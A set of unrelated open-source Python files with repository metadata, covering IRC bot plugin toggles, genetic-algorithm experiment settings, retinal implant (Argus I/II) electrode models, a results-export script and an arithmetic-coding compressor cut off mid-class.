    elif args[1] in ["enable", "disable"] : connection.ircsend(info["channel"], _("You cannot disable the disable or enable commands!"))
    elif args[1] == "*" :
        for plugin in connection.plugins["pluginlist"].pluginlist :
            if plugin not in ["enable", "disable"] and plugin in connection.users["channels"][info["channel"]]["enabled"]:
                connection.users["channels"][info["channel"]]["enabled"].remove(plugin)
                connection.users.sync()
        connection.ircsend(info["channel"], _("All plugins have been disabled for this channel"))
| {
"repo_name": "sonicrules1234/sonicbot",
"path": "oldplugins/disable.py",
"copies": "1",
"size": "1231",
"license": "bsd-3-clause",
"hash": -6061289414388785000,
"line_mean": 60.55,
"line_max": 140,
"alpha_frac": 0.6238830219,
"autogenerated": false,
"ratio": 4.158783783783784,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5282666805683784,
"avg_score": null,
"num_lines": null
} |
# Plugin metadata consumed by the sonicbot plugin loader.
arguments = ["self", "info", "args"]  # parameters the bot passes to main()
minlevel = 3  # minimum user level required to run this command
helpstring = "enable <plugin>"  # usage string shown by the help command
def main(connection, info, args) :
    """Enables a plugin

    args[1] names the plugin to enable in the current channel, or "*"
    to enable every known plugin; enable/disable themselves are fixed.
    """
    target = args[1]
    # Alias the channel's enabled-plugin list; appends mutate it in place.
    enabled = connection.users["channels"][info["channel"]]["enabled"]
    if target in ("enable", "disable"):
        connection.ircsend(info["channel"], _("You cannot enable the disable or enable commands!"))
    elif target == "*":
        for plugin in connection.plugins["pluginlist"].pluginlist :
            if plugin not in ("enable", "disable") and plugin not in enabled:
                enabled.append(plugin)
                connection.users.sync()
        connection.ircsend(info["channel"], _("All plugins have been enabled for this channel"))
    elif target not in enabled:
        enabled.append(target)
        connection.users.sync()
        connection.ircsend(info["channel"], _("The %(pluginname)s plugin has been enabled in this channel") % dict(pluginname=target))
    else:
        connection.ircsend(info["channel"], _("That plugin is not disabled!"))
| {
"repo_name": "sonicrules1234/sonicbot",
"path": "oldplugins/enable.py",
"copies": "1",
"size": "1209",
"license": "bsd-3-clause",
"hash": 1152776277062208100,
"line_mean": 62.6315789474,
"line_max": 139,
"alpha_frac": 0.6277915633,
"autogenerated": false,
"ratio": 4.08445945945946,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.521225102275946,
"avg_score": null,
"num_lines": null
} |
# Arguments used by the GA; each list is a parameter grid and the runner
# explores their cross product.  Larger grids previously tried:
# POP_SIZE = [25,50]
# LK_PERCENTAGE = [0,0.2]
# NEW_POP_TYPE = [0,1,2,3]
# N_BEST = [5]
# RESET_PERCENTAGE = [0.5]
# NEW_TOUR_MODE = [2]
POP_SIZE = [25]
LK_PERCENTAGE = [0]
NEW_POP_TYPE = [0,1,2]
N_BEST = [5]
RESET_PERCENTAGE = [0.5]
NEW_TOUR_MODE = [2]
# Historical experiment presets, kept for reference:
#run 0
# POP_SIZE = [50, 75, 100]
# LK_PERCENTAGE = [0, 0.1, 0.2]
# NEW_POP_TYPE = 0
# N_BEST = 3
#run 1
# POP_SIZE = [50, 75, 100]
# LK_PERCENTAGE = [0, 0.1, 0.2]
# NEW_POP_TYPE = 1
# N_BEST = 3
#run 2
# POP_SIZE = [50, 75, 100]
# LK_PERCENTAGE = [0, 0.1, 0.2]
# NEW_POP_TYPE = 2
# N_BEST = 3
# Number of times the algorithm should run in each set of configs
NUMBER_OF_RUNS = 1
# List of TSPLIB datasets for the algorithm; alternates kept for reference:
#TOURS = ["a280","att48","berlin52","burma14","ch150","eil101","gr137","pbd984","pcb442","u1432"]
#TOURS = ["att48","berlin52","eil101","ch150","a280","gr137"]
# TOURS = ['berlin52','att48','eil101']
TOURS = ['berlin52','att48']
# TOURS = ['ch150','a280']
# Path to TSP folder and executables; change only if you change the
# project folder structure.
LIBS_PATH = "tsp/"
BIN_PATH = "bin/"
| {
"repo_name": "GAStudyGroup/GPX2",
"path": "scp/configs.py",
"copies": "1",
"size": "1249",
"license": "mit",
"hash": -4044112069713661400,
"line_mean": 26.152173913,
"line_max": 97,
"alpha_frac": 0.5396317054,
"autogenerated": false,
"ratio": 2.379047619047619,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8320266244858479,
"avg_score": 0.019682615917828054,
"num_lines": 46
} |
"""`ArgusI`, `ArgusII`"""
import numpy as np
from collections import OrderedDict
from .base import ProsthesisSystem
from .electrodes import DiskElectrode
from .electrode_arrays import ElectrodeGrid
class ArgusI(ProsthesisSystem):
    """Create an Argus I array on the retina

    This function creates an Argus I array and places it on the retina
    such that the center of the array is located at 3D location (x,y,z),
    given in microns, and the array is rotated by rotation angle ``rot``,
    given in radians.

    Argus I is a modified cochlear implant containing 16 electrodes in a 4x4
    array with a center-to-center separation of 800 um, and two electrode
    diameters (250 um and 500 um) arranged in a checkerboard pattern
    [Yue2020]_.

    The array is oriented in the visual field as shown in Fig. 1 of
    [Horsager2009]_; that is, if placed in (0,0), the top two rows will lie in
    the lower retina (upper visual field):

    .. raw:: html

        <pre>
          -->x    A1 B1 C1 D1                     250 500 250 500
          |       A2 B2 C2 D2    where electrode  500 250 500 250
          v       A3 B3 C3 D3    diameters are:   250 500 250 500
          y       A4 B4 C4 D4                     500 250 500 250
        </pre>

    Electrode order is: A1, B1, C1, D1, A2, B2, ..., D4.
    If ``use_legacy_names`` is True, electrode order is: L6, L2, M8, M4, ...
    An electrode can be addressed by name, row/column index, or integer index
    (into the flattened array).

    .. note::

        Column order is reversed in a left-eye implant.

    Parameters
    ----------
    x : float, optional
        x coordinate of the array center (um)
    y : float, optional
        y coordinate of the array center (um)
    z : float or array_like, optional
        Distance of the array to the retinal surface (um). Either a list
        with 16 entries or a scalar.
    rot : float, optional
        Rotation angle of the array (rad). Positive values denote
        counter-clock-wise (CCW) rotations in the retinal coordinate
        system.
    eye : {'RE', 'LE'}, optional
        Eye in which array is implanted.

    Examples
    --------
    Create an Argus I array centered on the fovea, at 100um distance from
    the retina:

    >>> from pulse2percept.implants import ArgusI
    >>> ArgusI(x=0, y=0, z=100, rot=0)  # doctest: +NORMALIZE_WHITESPACE
    ArgusI(earray=ElectrodeGrid, eye='RE', shape=(4, 4),
    stim=None)

    Get access to electrode 'B1', either by name or by row/column index:

    >>> argus = ArgusI(x=0, y=0, z=100, rot=0)
    >>> argus['B1']
    DiskElectrode(r=250.0, x=-400.0, y=-1200.0, z=100.0)
    >>> argus[0, 1]
    DiskElectrode(r=250.0, x=-400.0, y=-1200.0, z=100.0)
    """
    # Frozen class: User cannot add more class attributes
    __slots__ = ('shape',)
    def __init__(self, x=0, y=0, z=0, rot=0, eye='RE', stim=None,
                 use_legacy_names=False):
        self.eye = eye
        self.shape = (4, 4)
        # Radii (um): diameters 250/500 alternate within a row; reversing
        # every other row slice produces the checkerboard over the 4x4 grid.
        r_arr = np.array([250, 500, 250, 500]) / 2.0
        r_arr = np.concatenate((r_arr, r_arr[::-1], r_arr, r_arr[::-1]),
                               axis=0)
        spacing = 800.0
        # In older papers, Argus I electrodes go by L and M:
        old_names = names = ['L6', 'L2', 'M8', 'M4',
                             'L5', 'L1', 'M7', 'M3',
                             'L8', 'L4', 'M6', 'M2',
                             'L7', 'L3', 'M5', 'M1']
        # ('1', 'A') is presumably the row/column label seed understood by
        # ElectrodeGrid (yields A1..D4) -- TODO confirm against ElectrodeGrid.
        names = old_names if use_legacy_names else ('1', 'A')
        self.earray = ElectrodeGrid(self.shape, spacing, x=x, y=y, z=z,
                                    rot=rot, etype=DiskElectrode, r=r_arr,
                                    names=names)
        # Beware of race condition: Stim must be set last, because it requires
        # indexing into self.electrodes:
        self.stim = stim
        # Set left/right eye:
        if not isinstance(eye, str):
            raise TypeError("'eye' must be a string, either 'LE' or 'RE'.")
        if eye != 'LE' and eye != 'RE':
            raise ValueError("'eye' must be either 'LE' or 'RE'.")
        self.eye = eye
        # Unfortunately, in the left eye the labeling of columns is reversed...
        if eye == 'LE':
            # FIXME: Would be better to have more flexibility in the naming
            # convention. This is a quick-and-dirty fix:
            names = list(self.earray.keys())
            objects = list(self.earray.values())
            names = np.array(names).reshape(self.earray.shape)
            # Reverse column names:
            for row in range(self.earray.shape[0]):
                names[row] = names[row][::-1]
            # Build a new ordered dict:
            electrodes = OrderedDict()
            for name, obj in zip(names.ravel(), objects):
                electrodes.update({name: obj})
            # Assign the new ordered dict to earray:
            self.earray.electrodes = electrodes
    def _pprint_params(self):
        """Return dict of class attributes to pretty-print"""
        params = super()._pprint_params()
        params.update({'shape': self.shape})
        return params
class ArgusII(ProsthesisSystem):
    """Create an Argus II array on the retina

    This function creates an Argus II array and places it on the retina
    such that the center of the array is located at (x,y,z), given in
    microns, and the array is rotated by rotation angle ``rot``, given in
    radians.

    Argus II contains 60 electrodes of 225 um diameter arranged in a 6 x 10
    grid (575 um center-to-center separation) [Yue2020]_.

    The array is oriented upright in the visual field, such that an
    array with center (0,0) has the top three rows lie in the lower
    retina (upper visual field), as shown below:

    .. raw:: html

        <pre>
                  A1 A2 A3 A4 A5 A6 A7 A8 A9 A10
          -- x    B1 B2 B3 B4 B5 B6 B7 B8 B9 B10
          |       C1 C2 C3 C4 C5 C6 C7 C8 C9 C10
          v       D1 D2 D3 D4 D5 D6 D7 D8 D9 D10
          y       E1 E2 E3 E4 E5 E6 E7 E8 E9 E10
                  F1 F2 F3 F4 F5 F6 F7 F8 F9 F10
        </pre>

    Electrode order is: A1, A2, ..., A10, B1, B2, ..., F10.
    An electrode can be addressed by name, row/column index, or integer index
    (into the flattened array).

    .. note::

        Column order is reversed in a left-eye implant.

    Parameters
    ----------
    x : float
        x coordinate of the array center (um)
    y : float
        y coordinate of the array center (um)
    z: float or array_like
        Distance of the array to the retinal surface (um). Either a list
        with 60 entries or a scalar.
    rot : float
        Rotation angle of the array (rad). Positive values denote
        counter-clock-wise (CCW) rotations in the retinal coordinate
        system.
    eye : {'RE', 'LE'}, optional
        Eye in which array is implanted.

    Examples
    --------
    Create an ArgusII array centered on the fovea, at 100um distance from
    the retina:

    >>> from pulse2percept.implants import ArgusII
    >>> ArgusII(x=0, y=0, z=100, rot=0)  # doctest: +NORMALIZE_WHITESPACE
    ArgusII(earray=ElectrodeGrid, eye='RE', shape=(6, 10),
    stim=None)

    Get access to electrode 'E7', either by name or by row/column index:

    >>> argus = ArgusII(x=0, y=0, z=100, rot=0)
    >>> argus['E7']
    DiskElectrode(r=112.5, x=862.5, y=862.5, z=100.0)
    >>> argus[4, 6]
    DiskElectrode(r=112.5, x=862.5, y=862.5, z=100.0)
    """
    # Frozen class: User cannot add more class attributes
    __slots__ = ('shape',)
    def __init__(self, x=0, y=0, z=0, rot=0, eye='RE', stim=None):
        self.shape = (6, 10)
        # 225 um electrode diameter -> 112.5 um radius (see doctest above).
        r = 225.0 / 2.0
        spacing = 575.0
        # ('A', '1') is presumably the row/column label seed understood by
        # ElectrodeGrid (yields A1..F10) -- TODO confirm against ElectrodeGrid.
        names = ('A', '1')
        self.earray = ElectrodeGrid(self.shape, spacing, x=x, y=y, z=z, r=r,
                                    rot=rot, names=names, etype=DiskElectrode)
        # Beware of race condition: Stim must be set last, because it requires
        # indexing into self.electrodes:
        self.stim = stim
        # Set left/right eye:
        if not isinstance(eye, str):
            raise TypeError("'eye' must be a string, either 'LE' or 'RE'.")
        if eye != 'LE' and eye != 'RE':
            raise ValueError("'eye' must be either 'LE' or 'RE'.")
        self.eye = eye
        # Unfortunately, in the left eye the labeling of columns is reversed...
        if eye == 'LE':
            # TODO: Would be better to have more flexibility in the naming
            # convention. This is a quick-and-dirty fix:
            names = list(self.earray.keys())
            objects = list(self.earray.values())
            names = np.array(names).reshape(self.earray.shape)
            # Reverse column names:
            for row in range(self.earray.shape[0]):
                names[row] = names[row][::-1]
            # Build a new ordered dict:
            electrodes = OrderedDict()
            for name, obj in zip(names.ravel(), objects):
                electrodes.update({name: obj})
            # Assign the new ordered dict to earray:
            self.earray.electrodes = electrodes
    def _pprint_params(self):
        """Return dict of class attributes to pretty-print"""
        params = super()._pprint_params()
        params.update({'shape': self.shape})
        return params
| {
"repo_name": "uwescience/pulse2percept",
"path": "pulse2percept/implants/argus.py",
"copies": "1",
"size": "9355",
"license": "bsd-3-clause",
"hash": 6836969295041147000,
"line_mean": 36.42,
"line_max": 79,
"alpha_frac": 0.5741314805,
"autogenerated": false,
"ratio": 3.4330275229357796,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.450715900343578,
"avg_score": null,
"num_lines": null
} |
# argv[1] - file path to main folder (like $HOME/dsge-models)
# argv[2] - name of model (e.g. 'dsf' or 'nk' or 'ca')
from scipy.io import loadmat
from sys import argv
from json import load
TT = 30 # how many periods of results to send
model = argv[2]
fpath = argv[1] + '/' + model + '_mfiles/'
# Accumulates the body of a JSON object as a string ("key":[values],...).
json = ''
#### 1 - load model results
# load results from mat file and convert to numpy lists
#mat = loadmat(fpath + model + '_results.mat')
#endo_names = mat['M_']['endo_names'].tolist()[0][0]
#endo_simul = mat['oo_']['endo_simul'].tolist()[0][0]
# make string of JSON-looking data out of numpy lists
#for name, simul in zip(endo_names, endo_simul):
#    json += '"' + name.strip() + '":'
#    json += '[' + ','.join(['%2f' % jj for jj in simul[0:TT]]) + '],'
#### 2 - load extra plot vars
# load results from mat file and convert to numpy lists (new format though)
mat = loadmat(fpath + 'plot_vars.mat')
plot_names = mat['plot_vars'].dtype.names
plot_simul = mat['plot_vars'][0][0]
# Emit one "name":[first TT values] entry per plot variable.
for name, simul in zip(plot_names, plot_simul):
    print 'name: ' + name
    json += '"' + name.strip() + '":'
    json += '[' + ','.join(['%2f' % jj for jj in simul[0:TT]]) + '],'
# write JSON-looking string to file (drop the trailing comma, wrap in braces)
f = open(model + '_mfiles/' + model + '_results.json', 'w')
f.write('{' + json[:-1] + '}')
f.close()
# pull JSON data into python dict
json_data = open(fpath + model + '_results.json')
data = load(json_data)
json_data.close()
# pull JSON of short+long var names into python dict
json_names = open(fpath + 'json/var_list.json')
names = load(json_names)
json_names.close()
# make string of public directory (parent of fpath, plus /public/)
pub_fpath = fpath[:fpath[:-1].rfind('/')] + '/public/'
# create csv file to write to: one row per variable, long name then values
f = open(pub_fpath + model + '_results.csv','w')
for key in data.keys():
    #f.write(str(key) + ', ' + str(data[key])[1:-1] + '\n')
    f.write(str(names[key]) + ', ' + str(data[key])[1:-1] + '\n')
f.close()
| {
"repo_name": "wclark3/dsge-models",
"path": "dsf_mfiles/save_results.py",
"copies": "2",
"size": "1975",
"license": "mit",
"hash": 1113913892006379300,
"line_mean": 31.3770491803,
"line_max": 79,
"alpha_frac": 0.5913924051,
"autogenerated": false,
"ratio": 2.9129793510324484,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9483922851122588,
"avg_score": 0.004089781001972207,
"num_lines": 61
} |
"""argvemulator - create sys.argv from OSA events. Used by applets that
want unix-style arguments.
"""
from warnings import warnpy3k
warnpy3k("In 3.x, the argvemulator module is removed.", stacklevel=2)
import sys
import traceback
from Carbon import AE
from Carbon.AppleEvents import *
from Carbon import Evt
from Carbon import File
from Carbon.Events import *
import aetools
class ArgvCollector:
    """A minimal FrameWork.Application-like class

    Collects pathnames from "open documents" Apple Events and appends
    them to sys.argv, emulating unix-style argument passing for applets.
    """
    def __init__(self):
        self.quitting = 0
        # Remove the funny -psn_xxx_xxx argument
        if len(sys.argv) > 1 and sys.argv[1][:4] == '-psn':
            del sys.argv[1]
        # Handle "open application" and "open documents" core Apple Events.
        AE.AEInstallEventHandler(kCoreEventClass, kAEOpenApplication, self.__runapp)
        AE.AEInstallEventHandler(kCoreEventClass, kAEOpenDocuments, self.__openfiles)
    def close(self):
        """Uninstall the Apple Event handlers installed in __init__."""
        AE.AERemoveEventHandler(kCoreEventClass, kAEOpenApplication)
        AE.AERemoveEventHandler(kCoreEventClass, kAEOpenDocuments)
    def mainloop(self, mask = highLevelEventMask, timeout = 1*60):
        """Pump events until the startup events arrive or timeout ticks pass."""
        # Note: this is not the right way to run an event loop in OSX or even
        # "recent" versions of MacOS9. This is however code that has proven
        # itself.
        stoptime = Evt.TickCount() + timeout
        while not self.quitting and Evt.TickCount() < stoptime:
            self._dooneevent(mask, timeout)
        if not self.quitting:
            print "argvemulator: timeout waiting for arguments"
        self.close()
    def _dooneevent(self, mask = highLevelEventMask, timeout = 1*60):
        """Wait for and dispatch a single event."""
        got, event = Evt.WaitNextEvent(mask, timeout)
        if got:
            self._lowlevelhandler(event)
    def _lowlevelhandler(self, event):
        """Route high-level (Apple) events to AE processing; log the rest."""
        what, message, when, where, modifiers = event
        h, v = where
        if what == kHighLevelEvent:
            try:
                AE.AEProcessAppleEvent(event)
            except AE.Error, err:
                msg = "High Level Event: %r %r" % (hex(message), hex(h | (v<<16)))
                print 'AE error: ', err
                print 'in', msg
                traceback.print_exc()
            return
        else:
            print "Unhandled event:", event
    def _quit(self):
        # Flag checked by mainloop() to stop pumping events.
        self.quitting = 1
    def __runapp(self, requestevent, replyevent):
        # "Open application" (no documents): nothing to collect.
        self._quit()
    def __openfiles(self, requestevent, replyevent):
        # "Open documents": resolve each alias to a pathname and append
        # it to sys.argv.
        try:
            listdesc = requestevent.AEGetParamDesc(keyDirectObject, typeAEList)
            for i in range(listdesc.AECountItems()):
                aliasdesc = listdesc.AEGetNthDesc(i+1, typeAlias)[1]
                alias = File.Alias(rawdata=aliasdesc.data)
                fsref = alias.FSResolveAlias(None)[0]
                pathname = fsref.as_pathname()
                sys.argv.append(pathname)
        except Exception, e:
            print "argvemulator.py warning: can't unpack an open document event"
            import traceback
            traceback.print_exc()
        self._quit()
if __name__ == '__main__':
    # Smoke test: collect startup arguments and show the resulting argv.
    ArgvCollector().mainloop()
    print "sys.argv=", sys.argv
| {
"repo_name": "MalloyPower/parsing-python",
"path": "front-end/testsuite-python-lib/Python-2.7/Lib/plat-mac/argvemulator.py",
"copies": "73",
"size": "3061",
"license": "mit",
"hash": 2263519014946303000,
"line_mean": 32.2717391304,
"line_max": 85,
"alpha_frac": 0.6164652074,
"autogenerated": false,
"ratio": 3.811955168119552,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.008209821398889818,
"num_lines": 92
} |
"""argvemulator - create sys.argv from OSA events. Used by applets that
want unix-style arguments.
"""
import sys
import traceback
from Carbon import AE
from Carbon.AppleEvents import *
from Carbon import Evt
from Carbon.Events import *
import aetools
class ArgvCollector:
    """A minimal FrameWork.Application-like class

    Collects pathnames from "open documents" Apple Events and appends
    them to sys.argv, emulating unix-style argument passing for applets.
    """
    def __init__(self):
        self.quitting = 0
        # Maps (event class, event id) -> Python callback.
        self.ae_handlers = {}
        # Remove the funny -psn_xxx_xxx argument
        if len(sys.argv) > 1 and sys.argv[1][:4] == '-psn':
            del sys.argv[1]
        self.installaehandler('aevt', 'oapp', self.open_app)
        self.installaehandler('aevt', 'odoc', self.open_file)
    def installaehandler(self, classe, type, callback):
        """Register callback for the given Apple Event class/type pair."""
        AE.AEInstallEventHandler(classe, type, self.callback_wrapper)
        self.ae_handlers[(classe, type)] = callback
    def close(self):
        """Uninstall all Apple Event handlers registered on this instance."""
        for classe, type in self.ae_handlers.keys():
            AE.AERemoveEventHandler(classe, type)
    def mainloop(self, mask = highLevelEventMask, timeout = 1*60):
        """Pump events until the startup events arrive or timeout ticks pass."""
        stoptime = Evt.TickCount() + timeout
        while not self.quitting and Evt.TickCount() < stoptime:
            self.dooneevent(mask, timeout)
        self.close()
    def _quit(self):
        # Flag checked by mainloop() to stop pumping events.
        self.quitting = 1
    def dooneevent(self, mask = highLevelEventMask, timeout = 1*60):
        """Wait for and dispatch a single event."""
        got, event = Evt.WaitNextEvent(mask, timeout)
        if got:
            self.lowlevelhandler(event)
    def lowlevelhandler(self, event):
        """Route high-level (Apple) events to AE processing; log the rest."""
        what, message, when, where, modifiers = event
        h, v = where
        if what == kHighLevelEvent:
            try:
                AE.AEProcessAppleEvent(event)
            except AE.Error, err:
                msg = "High Level Event: %s %s" % \
                    (`hex(message)`, `hex(h | (v<<16))`)
                print 'AE error: ', err
                print 'in', msg
                traceback.print_exc()
            return
        else:
            print "Unhandled event:", event
    def callback_wrapper(self, _request, _reply):
        """Unpack an Apple Event, dispatch to the registered handler
        (with '****' wildcard fallback), and pack the reply."""
        _parameters, _attributes = aetools.unpackevent(_request)
        _class = _attributes['evcl'].type
        _type = _attributes['evid'].type
        if self.ae_handlers.has_key((_class, _type)):
            _function = self.ae_handlers[(_class, _type)]
        elif self.ae_handlers.has_key((_class, '****')):
            _function = self.ae_handlers[(_class, '****')]
        elif self.ae_handlers.has_key(('****', '****')):
            _function = self.ae_handlers[('****', '****')]
        else:
            # NOTE(review): Python-2 string exception (long deprecated);
            # left as-is to preserve behavior.
            raise 'Cannot happen: AE callback without handler', (_class, _type)
        # XXXX Do key-to-name mapping here
        _parameters['_attributes'] = _attributes
        _parameters['_class'] = _class
        _parameters['_type'] = _type
        if _parameters.has_key('----'):
            _object = _parameters['----']
            del _parameters['----']
            # The try/except that used to be here can mask programmer errors.
            # Let the program crash, the programmer can always add a **args
            # to the formal parameter list.
            rv = _function(_object, **_parameters)
        else:
            #Same try/except comment as above
            rv = _function(**_parameters)
        if rv == None:
            aetools.packevent(_reply, {})
        else:
            aetools.packevent(_reply, {'----':rv})
    def open_app(self, **args):
        """Handler for "open application" (no documents to collect)."""
        self._quit()
    def open_file(self, _object=None, **args):
        """Handler for "open documents": resolve each alias to a pathname
        and append it to sys.argv."""
        for alias in _object:
            fsr = alias.FSResolveAlias(None)[0]
            pathname = fsr.as_pathname()
            sys.argv.append(pathname)
        self._quit()
    def other(self, _object=None, _class=None, _type=None, **args):
        """Catch-all handler: log and ignore unknown Apple Events."""
        print 'Ignore AppleEvent', (_class, _type), 'for', _object, 'Other args:', args
if __name__ == '__main__':
    # Smoke test: collect startup arguments and show the resulting argv.
    ArgvCollector().mainloop()
    print "sys.argv=", sys.argv
| {
"repo_name": "MalloyPower/parsing-python",
"path": "front-end/testsuite-python-lib/Python-2.3/Lib/plat-mac/argvemulator.py",
"copies": "1",
"size": "3922",
"license": "mit",
"hash": 5486657790097544000,
"line_mean": 33.4035087719,
"line_max": 87,
"alpha_frac": 0.5634880163,
"autogenerated": false,
"ratio": 3.782063645130183,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4845551661430183,
"avg_score": null,
"num_lines": null
} |
# argv is the list of arguments passed to the python interpreter.
from sys import argv
# Run this script like this:
#   python ex16.py test16.txt
script, filename = argv
# %r uses repr() instead of str() to convert to a string, so the value is
# shown in its quoted/program form, e.g. for d = datetime.date.today():
#   str(d)  returns '2011-05-15'
#   repr(d) returns 'datetime.date(2011, 5, 14)'
print "We're going to erase %r." %filename
print "If you don't want that, hit CTRL-C (^C)."
print "If you do want that, hit RETURN."
raw_input("?")
print "Opening the file..."
# Modes w+, r+, and a+ open a file for both reading and writing.
target = open(filename, 'w')
print "Truncating the file. Goodbye!"
target.truncate()
print "Now I'm going to ask you for three lines."
# raw_input reads a line of input as a string.
line1 = raw_input("line 1: ")
line2 = raw_input("line 2: ")
line3 = raw_input("line 3: ")
print "I'm going to write these to the file."
target.write(line1)
target.write("\n")
target.write(line2)
target.write("\n")
target.write(line3 + "\n") #Same as above but in a single line
print "And finally, we close it."
target.close()
print "Here are the contents of the textfile:"
# Opening without an explicit mode implicitly uses 'r' (read).
# 'w' writes, 'r' reads, 'a' appends.
target = open(filename)
print target.read()
| {
"repo_name": "liggettla/python",
"path": "ex16.py",
"copies": "1",
"size": "1370",
"license": "mit",
"hash": -4245421582085026300,
"line_mean": 27.5416666667,
"line_max": 73,
"alpha_frac": 0.7065693431,
"autogenerated": false,
"ratio": 3.106575963718821,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4313145306818821,
"avg_score": null,
"num_lines": null
} |
# Zodiac-sign identifiers used as keys throughout the horoscope parser.
ARIES = "aries"
TAURUS = "taurus"
GEMINI = "gemini"
CANCER = 'cancer'
LEO = 'leo'
VIRGO = 'virgo'
LIBRA = "libra"
SCORPIO = "scorpio"
SAGITTARIUS = "sagittarius"
CAPRICORN = "capricorn"
AQUARIOU = "aquarius"  # NOTE(review): misspelled name kept for backward compatibility
AQUARIUS = AQUARIOU    # correctly spelled alias
PISCES = "pisces"
COMMON = "common"

# RSS feed URL for each sign's daily "common" horoscope.
# BUG FIX: the hand-written table pointed LEO at ..._cancer.xml and
# SAGITTARIUS at ..._scorpio.xml (copy-paste errors); generating the URLs
# from the sign name fixes both and removes the duplication.
ANIMALS_DICT = {
    sign: {
        'daily_common_url': "https://hyrax.ru/rss_daily_common_{0}.xml".format(sign)
    }
    for sign in (ARIES, TAURUS, GEMINI, CANCER, LEO, VIRGO,
                 LIBRA, SCORPIO, SAGITTARIUS, CAPRICORN, AQUARIOU, PISCES)
}
| {
"repo_name": "adiletmaratov/horoscope-bot",
"path": "src/horoscope_parser/constants.py",
"copies": "1",
"size": "1424",
"license": "mit",
"hash": -1855375901391460000,
"line_mean": 26.3846153846,
"line_max": 77,
"alpha_frac": 0.5941011236,
"autogenerated": false,
"ratio": 2.507042253521127,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.36011433771211265,
"avg_score": null,
"num_lines": null
} |
"""arineto_website URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.conf.urls import include
from django.contrib import admin
from django.conf import settings
from django.views import static
# URL routing: admin site, blog app, and the landing page as the catch-all.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^blog/', include('apps.blog.urls', namespace='blog')),
    url(r'^', include('apps.landing_page.urls', namespace='landing')),
]

# In DEBUG mode serve user-uploaded media through Django itself; in
# production the web server is expected to serve MEDIA_ROOT directly.
if settings.DEBUG:
    urlpatterns += [
        url(
            r'^media/(?P<path>.*)$', static.serve,
            {'document_root': settings.MEDIA_ROOT}
        )
    ]
| {
"repo_name": "arineto/arineto-website",
"path": "arineto_website/urls.py",
"copies": "1",
"size": "1184",
"license": "mit",
"hash": -5757070875297243000,
"line_mean": 31.8888888889,
"line_max": 79,
"alpha_frac": 0.6706081081,
"autogenerated": false,
"ratio": 3.5770392749244713,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47476473830244714,
"avg_score": null,
"num_lines": null
} |
"""Arithmetic Coding
Functions for doing compression using arithmetic coding.
http://en.wikipedia.org/wiki/Arithmetic_coding
The functions and classes all need predictive models; see model.py
"""
import math
import itertools
def grouper(n, iterable, fillvalue=None):
    """Collect items of *iterable* into fixed-length tuples of size *n*,
    padding the final tuple with *fillvalue* when the input runs out."""
    # n references to one shared iterator => zip pulls n items per tuple.
    chunks = [iter(iterable)] * n
    return itertools.zip_longest(*chunks, fillvalue=fillvalue)
def compress(model, bits):
    """Compresses a stream of bits into another stream of bits.

    Requires a prediction model.
    """
    encoder = BinaryArithmeticEncoder(model)
    for bit in bits:
        yield from encoder.encode(bit)
    # Emit whatever coded bits remain buffered in the encoder.
    yield from encoder.flush()
def compress_bytes(model, bytes):
    """Compresses a stream of bytes into another stream of bytes.

    Requires a prediction model.
    """
    # Explode each byte into its 8 bits (LSB first), compress, then
    # reassemble the coded bit stream into bytes (zero-padded at the end).
    bits = ((m >> i) & 1 for m in bytes for i in range(8))
    coded = (str(b) for b in compress(model, bits))
    for byte_digits in grouper(8, coded, '0'):
        yield int(''.join(byte_digits), 2)
def decompress(model, bits, msglen):
    """Decompresses a stream of bits into another stream of bits.

    Requires the same prediction model (from its original state) that was
    used for compression, and the number of bits in the message.
    """
    decoder = BinaryArithmeticDecoder(model)
    emitted = 0
    for bit in bits:
        for symbol in decoder.decode(bit):
            yield symbol
            emitted += 1
    # Pump the decoder until the remaining symbols resolve.
    yield from decoder.flush(msglen - emitted)
def decompress_bytes(model, bytes, msglen):
    """Decompresses a stream of bytes into another stream of bytes.

    Requires the same prediction model (from its original state) that was
    used for compression, and the number of bytes in the message.
    """
    # Explode coded bytes into bits, decode, regroup decoded bits into bytes.
    cbits = ((m >> i) & 1 for m in bytes for i in range(8))
    decoded = (str(b) for b in decompress(model, cbits, msglen * 8))
    for byte_digits in grouper(8, decoded, '0'):
        yield int(''.join(byte_digits), 2)
class BinaryArithmeticEncoder:
    """BinaryArithmeticEncoder

    An arithmetic encoder for binary data sources. For the theory behind the
    encoder see http://en.wikipedia.org/wiki/Arithmetic_coding.

    >>> encoder = BinaryArithmeticEncoder(CTW(8))

    See also: BinaryArithmeticDecoder, compress, and compress_bytes
    """

    def __init__(self, model, num_bits=32):
        # model.update(symbol) is expected to return the log-probability of
        # the observed symbol (encode() exponentiates it).
        self.model = model
        self.num_bits = num_bits
        self._top = 2 ** self.num_bits
        self._half = self._top // 2   # [0, self._half) outputs the zero bit
        self._1_4 = self._half // 2
        # BUG FIX: this was `self._top - self._half`, which equals
        # self._half and made the underflow branch in encode() unreachable
        # (any interval with high <= _half is handled by the "output 0"
        # branch first), so follow bits were never produced and the encoder
        # desynchronized from BinaryArithmeticDecoder, whose 3/4 point is
        # `self._top - self._1_4`.
        self._3_4 = self._top - self._1_4
        self.low = 0                  # Interval is [self.low, self.high)
        self.high = self._top
        self.follow_bits = 0          # Opposing bits to follow the next output'd bit

    def encode(self, symbol):
